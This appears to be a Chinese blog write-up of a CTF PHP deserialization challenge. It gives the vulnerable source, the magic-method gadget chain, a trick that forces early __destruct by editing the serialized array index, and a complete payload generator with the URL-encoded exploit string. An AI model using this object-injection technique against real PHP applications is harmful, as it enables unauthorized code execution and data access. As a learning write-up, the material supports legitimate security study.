• 卷王杯 easy unserialize

    因为一个 __destruct函数的GC回收机制 没学过,所以没解出来。

    进入题目,给了源码:

    2. include("./HappyYear.php");
    3. class one {
    4.     public $object;
    5.  
    6.     public function MeMeMe() {
    7.         array_walk($this, function($fn, $prev){
    8.             if ($fn[0] === "Happy_func" && $prev === "year_parm") {
    9.                 global $talk;
    10.                 echo "$talk"."
      "      ;
    11.                 global $flag;
    12.                 echo $flag;
    13.             }
    14.         });
    15.     }
    16.  
    17.  
    18.     public function __destruct() {
    19.         @$this->object->add();
    20.     }
    21.  
    22.  
    23.     public function __toString() {
    24.         return $this->object->string;
    25.     }
    26. }
    27.  
    28.  
    29. class second {
    30.     protected $filename;
    31.  
    32.  
    33.     protected function addMe() {
    34.         return "Wow you have sovled".$this->filename;
    35.     }
    36.  
    37.  
    38.     public function __call($func, $args) {
    39.         call_user_func([$this, $func."Me"], $args);
    40.     }
    41. }
    42.  
    43.  
    44. class third {
    45.     private $string;
    46.  
    47.  
    48.     public function __construct($string) {
    49.         $this->string = $string;
    50.     }
    51.  
    52.  
    53.     public function __get($name) {
    54.         $var = $this->$name;
    55.         $var[$name]();
    56.     }
    57. }
    58.  
    59.  
    60. if (isset($_GET["ctfshow"])) {
    61.     $a=unserialize($_GET['ctfshow']);
    62.     throw new Exception("高一新生报道");
    63. } else {
    64.     highlight_file(__FILE__);
    65. }

    要输出flag,就要调用方法MeMeMe()

    一眼看过去,魔术方法__get里面的$var[$name]();都可控,可以利用 数组调用类中方法

    数组调用类中方法

    关于数组调用类中的方法,再给出几个详细的例子,也是算学得更精了:

    ##例子1

    2. error_reporting(0);
    3.  
    4. class one{
    5.         public function test()
    6.         {
    7.                 echo "123";
    8.         }
    9. }
    10. $a=array(one,test);
    11. $a();

    ##例子2

    还有一种是形似题目这种调用数组名的:

    可以从调试窗口看到得到清晰的划分。

    输出:

    123

    接下来就是触发各类魔方方法

    可以看之前的一篇文章

    我这里就把链子理一下:

    one::__destruct => second::__call=> second::addMe => one::__toString => third::__get => one::MeMeMe

    __destruct函数的GC回收机制:

    参考:

    https://www.jianshu.com/p/d73b3ca418b0

    2. class one{
    3.         public function __destruct(){
    4.                 echo "__destruct";
    5.         }
    6. }
    7.  
    8. $a = new one();
    9.  
    10. throw new Exception("高一新生报道");

    解决方法:

    2. class one{
    3.     public $string;
    4.     public function __destruct(){
    5.         echo "__destruct";
    6.     }
    7. }
    8.  $a=new one();
    9.  $b=array($a,NULL);
    10.  echo serialize($b);

    以上代码序列化的结果:

    a:2:{i:0;O:3:"one":0:{}i:1;N;}

    把后面的i:1改成i:0,达到提前销毁对象的目的,从而执行魔术方法__destruct

    payload:

    2. /**
    3.  * @Author: F10wers_13eiCheng
    4.  * @Date:   2022-02-01 11:25:02
    5.  * @Last Modified by:   F10wers_13eiCheng
    6.  * @Last Modified time: 2022-02-07 15:08:18
    7.  */
    8. include("./HappyYear.php");
    9.  
    10. class one {
    11.     public $year_parm=array("Happy_func");
    12.     public $object;
    13.     
    14.  
    15.     public function MeMeMe() {
    16.         array_walk($this, function($fn, $prev){
    17.             if ($fn[0] === "Happy_func" && $prev === "year_parm") {
    18.                 global $talk;
    19.                 echo "$talk"."
      "      ;
    20.                 global $flag;
    21.                 echo $flag;
    22.             }
    23.         });
    24.     }
    25.  
    26.     public function __destruct() {
    27.         @$this->object->add();
    28.     }
    29.  
    30.     public function __toString() {
    31.         return $this->object->string;
    32.     }
    33. }
    34.  
    35. class second {
    36.     public $filename;
    37.  
    38.     protected function addMe() {
    39.         return "Wow you have sovled".$this->filename;
    40.     }
    41.  
    42.     public function __call($func, $args) {
    43.         call_user_func([$this, $func."Me"], $args);
    44.     }
    45. }
    46.  
    47. class third {
    48.     private $string;
    49.  
    50.     public function __construct($string) {
    51.         $this->string = $string;
    52.     }
    53.  
    54.     public function __get($name) {
    55.         $var = $this->$name;
    56.         $var[$name]();
    57.     }
    58. }
    59.  
    60. $a=new one();
    61. $a->object=new second();
    62. $a->object->filename=new one();
    63. $a->object->filename->object=new third(array("string"=>[new one(),MeMeMe]));
    64. $b = array($a,NULL);
    65. echo urlencode(serialize($b));

    生成的payload:

    a%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7Ds%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7Ds%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7Ds%3A6%3A%22object%22%3BN%3B%7Di%3A1%3Bs%3A6%3A%22MeMeMe%22%3B%7D%7D%7D%7D%7D%7Di%3A0%3BN%3B%7D

    标注颜色的是由1改成0,达到提前销毁变量触发__destruct的目的

     

  • 相关阅读:
    JUC-Future、CompletionService、CompletableFuture
    Yapi idea插件使用
    今晚8点不见不散
    一分钟了解乐观锁、悲观锁、共享锁、排它锁、行锁、表锁以及使用场景
    win10查看wifi密码
    Docker--harbor私有仓库部署与管理
    Java如何使用Hutool执行日期的加法和减法操作?
    生成代理:人类行为的交互模拟(Generative Agents: Interactive Simulacra of Human Behavior)
    Qt实现图书管理系统(C++)
    Vue3最佳实践 第七章 TypeScript 中
  • 原文地址:https://blog.csdn.net/qq_64201116/article/details/127413345